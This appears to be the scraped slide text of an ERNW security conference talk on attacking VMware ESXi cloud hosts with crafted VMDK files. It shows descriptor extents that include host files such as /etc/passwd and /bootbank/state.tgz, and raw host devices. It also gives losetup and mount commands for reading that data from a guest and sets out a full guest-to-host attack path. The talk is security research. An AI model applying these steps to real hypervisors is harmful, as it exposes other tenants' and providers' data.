VMDK Has Left the Building

Size: px

Start display at page:

Download "VMDK Has Left the Building"

Wilfred Eaton
5 years ago
Views:

1 VMDK Has Left the Building Attacking VMware-Based Cloud Infrastructures Matthias Luft

2 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #2 Who we are Old-school network geeks, working as security researchers for Germany based ERNW GmbH - Independent - Deep technical knowledge - Structured (assessment) approach - Business reasonable recommendations - We understand corporate Blog: Conference:

3 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #3 Disclaimer This presentation claims no credit for any images or logos included in the slides unless otherwise noted. Images in this presentation are copyright to its respectful owners.

4 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #4 Agenda Intro & Technical Overview Attack Vectors Conclusions

5 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #5 Cloud Deployment Kudos to Juan Mayer

6 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #6 How Cloud Deployment Works ESXi 5 Host Backend Storage (e.g. SAN) 1) Upload to storage by web interface, FTP, Hypervisor Hypervisor Local HD

7 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #7 How Cloud Deployment Works ESXi 5 Host Backend Storage (e.g. SAN) Hypervisor 2) Copy/mount to Host Hypervisor Local HD

8 How Cloud Deployment Works ESXi 5 Host Backend Storage (e.g. SAN) Hypervisor Hypervisor Local HD 3) Cloud Magic! 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #8

9 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #9 Sample of Cloud Providers Allowing to Upload VMDKs à We ve not performed any practical testing. Yet. Provider Upload via Upload Validation Further Details & How To s terremark.com Web-Tool Ovf validation, vmdk validation information in ov default.asp?id=971&lang=1 lunahost.com Web-Tool Not specified FAQsandHowTos.aspx Cloudshare.com Ftp-client Ovf validation recommended but not required Hosting.com Online FTP manager None common/vm%20_upload_instructions.pdf

10 Lab Setup c) Start VM via SSH/CLI b) Start VM via API Copy malicious VM to backend storage via Ap a) Start VM via vcenter Fully patched environment as of 11/24/ /23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #10

11 Levels of Isolation Runtime/CPU/Memory Network Management Interfaces Storage 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #11

10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D-69115 Heidelberg #12 How to Attack a (IaaS) Cloud Service? Management APIs / Interfaces - http://www.nds.rub.

12 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #12 How to Attack a (IaaS) Cloud Service? Management APIs / Interfaces - AmazonSignatureWrapping.pdf - From the runtime environment - Think: Guest à host attack - E.g. look at all the nice attack vectors in VMSA with that ridiculous recommendation Do not allow untrusted users access to your virtual machines. ;-) On the filesystem level, e.g. by (virtual) image/hard disk upload.

13 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #13 What Is This All About? Attacking Virtual Hard Disks Special focus on VMDK files. In particular in VMware vsphere 5 environments.

14 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #14 Virtual File Formats Short Overview There s a whole bunch of virtual file formats Relevant Fact: Distinction in - Virtual machine configuration - Virtual disk files

15 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #15 Common Files in VMware World At least the most important ones as for this talk. VMX: virtual machine - Plain-text configuration/description #!/opt/vmware/server/bin/vmware.encoding = "UTF-8" config.version = "8" virtualhw.version = "4" scsi0.present = "TRUE" memsize = "1512 scsi0:0.filename = file.vmdk Scsi0:0.deviceType = disk

10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D-69115 Heidelberg #16 Common Files in VMware World At least the most important ones as for this talk.

16 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #16 Common Files in VMware World At least the most important ones as for this talk. VMDK: virtual disk, consisting of two file types: - Descriptor file: # Disk DescriptorFile version=1 encoding="utf-8" CID=a5c61889 [ ] # Extent description RW VMFS "machine-flat01.vmdk - The actual disk files containing raw disk data (MBR, partition table, file system, content...)

17 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #17 File Inclusion

18 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #18 File Inclusion Back to that Descriptor File # Disk DescriptorFile version=1 encoding="utf-8" CID=a5c61889 parentcid=ffffffff isnativesnapshot="no" createtype="vmfs" # Extent description RW VMFS "machine-flat01.vmdk

19 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #19 File Inclusion Back to that Descriptor File # Disk DescriptorFile version=1 encoding="utf-8" CID=a5c61889 parentcid=ffffffff isnativesnapshot="no" createtype="vmfs" # Extent description RW VMFS "machine-flat01.vmdk RW 0 VMFS /etc/passwd

20 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #20 Inclusion First Try The classic: /etc/passwd RW VMFS "machine-flat01.vmdk RW 0 VMFS "/etc/passwd Didn t work ;-)

21 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #21 Inclusion First Try

22 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #22 First Blood Logfile Inclusion

23 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #23 Inclusion of Logs Extend your disk by any gzipped logfile in /scratch/log # Extent description RW VMFS "machine-flat.vmdk RW 0 VMFS "/scratch/log/vmkernel.0.gz"

24 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #24 Inclusion of Logs Boot up the virtual machine Define the included section of your hard drive $ losetup o $( * 512 ) f /dev/sda Extract data $ zcat /dev/loop0 > extracted_logfile

25 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #25 Demo? Yes, please. DEMO

26 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #26 File Inclusion Just to Make this Clear This is a GUEST machine accessing the files of the ESX HOST!

27 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #27 File Inclusion Part 2 Logs are a nice first step! Let s go through some more log files...

10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D-69115 Heidelberg #28 Interesting log file /bootbank/state.

28 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #28 Interesting log file /bootbank/state.tgz # Disk DescriptorFile version=1 encoding="utf-8" CID=a5c61889 [ ] # Extent description RW VMFS "machine-flat01.vmdk RW 0 VMFS /bootbank/state.tgz à Contains backup of modified files in /etc!

29 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #29 File Inclusion Just to Make this Clear This is a GUEST machine accessing /etc/ of the ESX HOST!

10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D-69115 Heidelberg #30 File Inclusion Part 3 Logfiles, /etc... on the right way.

30 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #30 File Inclusion Part 3 Logfiles, /etc... on the right way. What else can we do? Hard drives/devices in *nix are files, right? à Try to include physical host disks in a guest machine!

31 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #31 Device Inclusion Part 3 Device names on ESXi

10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D-69115 Heidelberg #32 Device Inclusion Part 3 Relying on knowledge gathered on the hypervisor!

32 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #32 Device Inclusion Part 3 Relying on knowledge gathered on the hypervisor! # Disk DescriptorFile version=1 encoding="utf-8" CID=a5c61889 [ ] # Extent description RW VMFS "machine-flat01.vmdk RW VMFSRAW "/dev/disks/naa b1001ca97740cc c136:2"

partition of an enumerated device as follows: # Extent

33 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #33 Device Inclusion Include a partition of an enumerated device as follows: # Extent description RW VMFS machine-flat.vmdk RW 0 VMFSRAW "/dev/disks/naa b1001ca97740cc c136:2 The :2 indicates the partition number, e.g. similar to Kindly /dev/sda2 the hypervisor in linux re- adjusts the block count if the actual file is bigger than stated in the extent descripkon

34 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #34 Device Inclusion Once you made your loop device with the appropriate offset, you are actually able to mount the partition root@attx:~# losetup -v -o f /dev/sda Loop device is /dev/loop0 root@attx:~# mount /dev/loop0 /mnt/ root@attx:~# ls /mnt/ core downloads log var

35 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #35 Device Inclusion Just to Make this Clear This is a GUEST machine accessing a physical harddrive of the ESX HOST!

36 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #36 Complete Attack Path In Cloud Environments

unlocked, e.g. not reserved by running Vmware ESXi5.0/5.1 hypervisor in use - both with kernel module multiextent loaded - which is not default for 5.

37 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #37 Prerequisites For Complete Attack Path Files - must be on separate partition - Root file system stored in ramdisk - must be unlocked, e.g. not reserved by running Vmware ESXi5.0/5.1 hypervisor in use - both with kernel module multiextent loaded - which is not default for 5.1 in general and 5.0 since patchset 5 ( language=en_us&cmd=displaykc&externalid= ) Deployment of externally provided VMDK files is possible Deployment without further sanitization/input validation/ VMDK rewriting.

38 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #38 Attack Path Deploy a virtual machine referencing /bootbank/state.tgz Unpack the tar archive and get device names from etc/vmware/esx.conf Deploy another virtual machine referencing the extracted device names à Enjoy access to all physical hard drives of the hypervisor ;-)

39 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #39 Device Inclusion Just to Make this Clear This is a GUEST machine accessing physical harddrive of the ESX HOST without additional knowledge!

40 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #40 Got Root? How To Deploy A Rootshell

41 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #41 Know Your Target Identifying The Weak Spot Base file system stored in RAM disk RAM disk is populated at boot time Current firmware is stored on own partition Firmware is made up out of several archive files, overwriting each others content partially

42 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #42 Know Your Target Identifying The Weak Spot Base file system stored in RAM disk RAM disk is populated at boot time Current firmware is stored on own partition Firmware is made up out of several archive files, overwriting each others content partially

43 boot.cfg List of modules Content of module B overwrites content of module A state.tgz is last module state.tgz is a periodic backup 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #43

44 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #44 There s even more stuff Coming Soon To A Cloud Near You... Hypervisor Denial of Service? Not to be discussed in this talk due to time constraints.

45 But It s Certainly Doable ;-) 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #45

46 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #46 Conclusions Virtual hard disk integration offers yetanother-interface for attack exposure. In particular in VMware vsphere 5 space. Appropriate trust relationships and/or careful sanitizing needed. - do not allow untrusted users

47 10/23/13 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #47 Hvala za vašo pozornost! There s never enough 1me THANK YOU...for yours!

VMDK Has Left the Building

VMDK Has Left the Building Attacking VMware-Based Cloud Infrastructures Hendrik Schmidt & Pascal Turbing {hschmidt, pturbing}@ernw.de 11/30/2012 ERNW GmbH Carl-Bosch-Str. 4 D-69115 Heidelberg #2 Who we